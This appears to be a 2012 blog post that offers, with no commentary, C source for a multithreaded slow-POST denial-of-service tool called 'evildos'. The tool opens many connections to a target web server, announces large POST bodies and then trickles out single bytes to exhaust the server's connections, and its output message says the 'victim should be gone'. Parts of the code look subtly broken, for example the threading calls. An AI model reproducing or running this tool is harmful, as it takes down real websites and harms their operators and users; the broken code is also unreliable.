Thursday 9 August 2012

DOSS Attack (C++ code) Linux

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>

#define MAXSIZE 5000
#define THREADS 255

char startbuf[MAXSIZE];
char hostname[MAXSIZE];
int port;


void dothread(void *arg)
{
    int sd, count=0;
    struct sockaddr_in sin;
    struct sockaddr_in pin;
    struct hostent *hp;
    int self;
    char dot[1];
   
    memcpy(&self, arg, sizeof(int));

    if ((hp = gethostbyname(hostname)) == 0)
    {
        perror("gethostbyname");
        exit(1);
    }

    memset(&pin, 0, sizeof(pin));
    pin.sin_family = AF_INET;
    pin.sin_addr.s_addr = ((struct in_addr *)(hp->h_addr))->s_addr;
    pin.sin_port = htons(port);

    if ((sd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
    {
        perror("socket");
        return;
    }

    if (connect(sd,(struct sockaddr *)  &pin, sizeof(pin)) == -1)
    {
        perror("connect");
        return;
    }

    if (send(sd, startbuf, strlen(startbuf), 0) == -1)
    {
        perror("send");
        return;
    }

    dot[0] = (unsigned char)(self&0xFF);
   
    for (count=0;count<5000;count++)
    {
        /* just a weak PRNG..better use rand() instead */
        dot[0] = (unsigned char)(dot[0]+count);
        dot[0] = (unsigned char)((dot[0]<<1)|(dot[0]>>31))&0x7F;
        send(sd, dot, 1, 0);
        sleep(100);
    }

    close(sd);
}


void usage(void)
{
    printf("Usage: ./evildos <host> <port> <POST_URI>\n");
    printf("POST_URI is a URI that supports the POST method. Static content obviously don't\n");
    exit(1);
}

int main(int argc, char **argv)
{
    pthread_t threads[THREADS];
    int counter;
   
    if (argc!=4) usage();
   
    strcpy(hostname,argv[1]);
    port = atoi(argv[2]);
    sprintf(startbuf, "POST  %s  HTTP/1.1\nHost: %s\nAccept: text/html\nAccept-Encoding: gzip,deflate\nConnection: keep-alive\nKeep-alive: 900\nContent-length: 5000\n\n", argv[3],hostname);
   
    printf("Spawning threads\n");
    for (counter=1;counter<THREADS;counter++)
    {
        pthread_create(&threads[counter], NULL, dothread, &counter);
        usleep(100000);
    }
   
    printf("All threads spawned, wait for graceful shutdown. At that point unless there are limits on concurrent conns, victim should be gone.\n");
    for (counter=1;counter<THREADS;counter++)
    {
        pthread_join(&threads[counter]);
    }
}
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)